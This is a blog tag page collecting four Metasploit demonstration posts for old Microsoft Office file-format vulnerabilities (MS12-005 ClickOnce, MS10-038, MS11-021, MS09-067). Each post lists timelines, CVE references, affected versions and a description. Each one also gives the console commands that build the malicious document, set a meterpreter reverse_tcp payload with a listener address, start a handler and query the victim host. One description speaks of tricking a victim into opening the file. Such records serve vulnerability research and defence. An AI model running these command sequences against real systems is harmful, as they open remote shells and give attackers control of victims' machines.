aka wow on ZATAZ.com
Posts tagged Office
MS12-005 Microsoft Office ClickOnce Vulnerability Metasploit Demo
111 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered by Yorick Koster in Jun 2010
Coordinated public release of the vulnerability the 2012-01-10
Metasploit PoC provided the 2012-06-10
PoC provided by :
Yorick Koster
sinn3r
Reference(s) :
MS12-005
CVE-2012-0013
OSVDB-78207
BID-51284
Affected version(s) :
Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP2
Windows Vista x64 SP2
Windows Server 2008 32 SP2
Windows Server 2008 x64 Service Pack 2
Windows 7 32
Windows 7 32 SP1
Windows 7 x64
Windows 7 x64 SP1
Windows Server 2008 R2 x64
Windows Server 2008 R2 x64 SP1
Tested on Windows XP Pro SP3 with :
Microsoft Office Word 2007 (12.0.4518.1014)
Description :
The target will need an installation of Ruby or Python in order to execute the payload. Also macro execution in Word should be allowed.
This module exploits a vulnerability found in Microsoft Office’s ClickOnce feature. When handling a Macro document, the application fails to recognize certain file extensions as dangerous executables, which can be used to bypass the warning message. This allows you to trick your victim into opening the malicious document, which will load up either a python or ruby payload based on your choosing, and then finally download and execute our executable.
Commands :
use exploit/windows/fileformat/ms12_005 set SRVHOST 192.168.178.100 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit getuid sysinfo
MS10-038 Office Excel 2002 Overflow Exploit Metasploit Demo
01 year ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered and reported to vendor by Nicolas Joly
Coordinated release of the vulnerability the 2010-06-08
First exploit provided by abysssec the 2010-09-24
Metasploit PoC provided the 2011-11-21
PoC provided by :
Nicolas Joly
Shahin Ramezany
juan vazquez
Reference(s) :
CVE-2010-0822
OSVDB-65236
MS10-038
MOAUB #24
EBD-ID-15094
Affected version(s) :
Microsoft Office Excel 2002 Service Pack 3 and below
Microsoft Office Excel 2003 Service Pack 3 and below
Microsoft Office Excel 2007 Service Pack 1 and below
Microsoft Office Excel 2007 Service Pack 2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Microsoft Office Excel Viewer Service Pack 1 and below
Microsoft Office Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 1
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 2
Tested on Windows XP Pro SP3 with :
Microsoft Excel 2002 (10.2614.2625) SP0
Description :
This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get the control of the execution flow. This results arbitrary code execution under the context of the user.
Commands :
use exploit/windows/fileformat/ms10_038_excel_obj_bof set TARGET 0 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit -j getuid sysinfo
MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo
11 year ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered and reported to ZDI by Aniway
Vulnerability reported to vendor by ZDI the 2010-10-18
Coordinated release of the vulnerability the 2011-04-12
Metasploit PoC provided the 2011-11-05
PoC provided by :
Aniway
abysssec
sinn3r
juan vazquez
Reference(s) :
CVE-2011-0105
MS11-021
ZDI-11-121
Affected version(s) :
Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32 and 64 bits edition)
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
Open XML File Format Converter for Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2
Tested on Windows XP Pro SP3 with :
Microsoft Office Excel 2007 (12.0.4518.014)
Description :
This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results arbitrary code execution under the context of user the user.
Commands :
use exploit/windows/fileformat/ms11_021_xlb_bof set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 getuid sysinfo
MS09-067 : Microsoft Excel Malformed FEATHEADER Record Vulnerability
02 years ago
in Exploits, Metasploit
Timeline :
Vulnerability reported to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB973475″ provided the 2009-11-10
Metasploit PoC provided by hdm the 2010-02-12
Exploit-DB PoC provided by anonymous the 2010-08-21
PoC provided by :
Sean Larsson
jduck
Reference(s) :
Affected version(s) :
Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System SP1 & SP2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer SP1 & SP2
Microsoft Office Excel Viewer 2003 SP3
Tested on Windows XP SP3 with :
Office Excel 2003 SP3 before KB973475
Description :
This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code exection. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.
Commands :
use exploit/windows/fileformat/ms09_067_excel_featheader
set OUTPUTPATH /home/eromang
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploituse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jsessions -i 1
sysinfo
getuid
ipconfig
Recent Comments